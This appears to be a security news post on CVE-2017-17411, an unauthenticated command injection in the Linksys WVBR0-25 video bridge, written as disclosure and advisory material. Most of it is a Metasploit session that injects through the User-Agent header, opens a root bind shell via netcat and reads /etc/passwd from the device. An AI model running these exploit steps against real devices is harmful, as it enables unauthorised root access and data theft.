CVE-2017-17411: Linksys WVBR0 25 Command Injection

by do son · Published · Updated

CVE-2017-17411

Recently, the security researchers found a critical vulnerability on Linksys Wireless Bridge WVBR0-25 that allows remote attackers to execute arbitrary code on vulnerable installations of Linksys WVBR0 WVBR0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges.

Image: thehackernews

The vulnerability was discovered by Ricky Lawshae, a security researcher at Trend Micro Inc., a cybersecurity company. He said the device is leaking diagnostic data about the wireless bridges, including external device information connected to the wireless bridges, running processes, and Wi-Fi Protected Setup (WPS) passwords.

Mitigation:
Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting.

PoC

exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth Metasploit module

This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to “;<payload> #. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info



       Name: Linksys WVBR0-25 User-Agent Command Execution

     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth

   Platform: Unix

 Privileged: Yes

    License: Metasploit Framework License (BSD)

       Rank: Normal

  Disclosed: 2017-12-13



Provided by:

  HeadlessZeke



Available targets:

  Id  Name

  --  ----

  0   Automatic



Basic options:

  Name     Current Setting  Required  Description

  ----     ---------------  --------  -----------

  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]

  RHOST                     yes       The target address

  RPORT    80               yes       The target port

  SSL      false            no        Negotiate SSL/TLS for outgoing connections

  VHOST                     no        HTTP server virtual host



Payload information:

  Space: 1024



Description:

  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 

  connect wireless Genie cable boxes to the Genie DVR, is vulnerable 

  to OS command injection in version < 1.0.41 of the web management 

  portal via the User-Agent header. Authentication is not required to 

  exploit this vulnerability.



References:

  http://cvedetails.com/cve/2017-17411/

  http://www.zerodayinitiative.com/advisories/ZDI-17-973

  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair



msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads 



Compatible Payloads

===================



   Name                     Disclosure Date  Rank    Description

   ----                     ---------------  ----    -----------

   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)

   cmd/unix/generic                          normal  Unix Command, Generic Command Execution

   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)



msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 

payload => cmd/unix/bind_netcat

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104

RHOST => 10.0.0.104

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit



[*] 10.0.0.104:80 - Trying to access the device ...

[*] Started bind handler

[*] 10.0.0.104:80 - Exploiting...

[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600

id



uid=0(root) gid=0(root)

^C

Abort session 1? [y/N]  y



[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic 

payload => cmd/unix/generic

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd

cmd => cat /etc/passwd

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit



[*] 10.0.0.104:80 - Trying to access the device ...

[*] 10.0.0.104:80 - Exploiting...

[+] 10.0.0.104:80 - Command sent successfully

[*] 10.0.0.104:80 - Command output:  root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga

[*] Exploit completed, but no session was created.

msf exploit(linksys_wvbr0_user_agent_exec_noauth) >

 

Reference:

Tags: CVE-2017-17411